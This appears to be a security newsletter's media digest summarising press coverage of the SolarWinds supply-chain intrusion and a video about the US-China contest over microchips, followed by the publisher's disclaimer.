FROM THE MEDIA: The SolarWinds hack is described as the largest cyber attack on the US government, with potentially thousands of targets affected. It was a supply chain attack: the hackers compromised SolarWinds itself and used its software update channel to gain access to its customers' systems, which is why the trojanized update passed customers' ordinary update and signature checks. The intrusion was discovered by the cybersecurity company FireEye, which was itself a victim. The operation appears to have been a sophisticated form of intelligence collection rather than a disruptive or destructive attack. The US government has formidable attribution capabilities and can identify the responsible party. Deterrence is not effective against cyber intelligence activity, but raising the costs and making life harder for advanced adversaries can be.
USA vs China, The War You Can't See (Video)
FROM THE MEDIA: The US and China are engaged in a war over microchips, which are crucial for both commercial technology and military purposes. Microchips are being used as a currency of power, much as oil was in the past. The conflict is fought through government regulations and business rules designed to stop rivals from obtaining the most important technology in the world. The US has imposed restrictions on China's access to advanced computer chips while providing billions of dollars in subsidies to American chip makers to build domestic manufacturing capacity. The conflict is playing out in government offices and company boardrooms and is becoming part of how conflict works in the world today.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.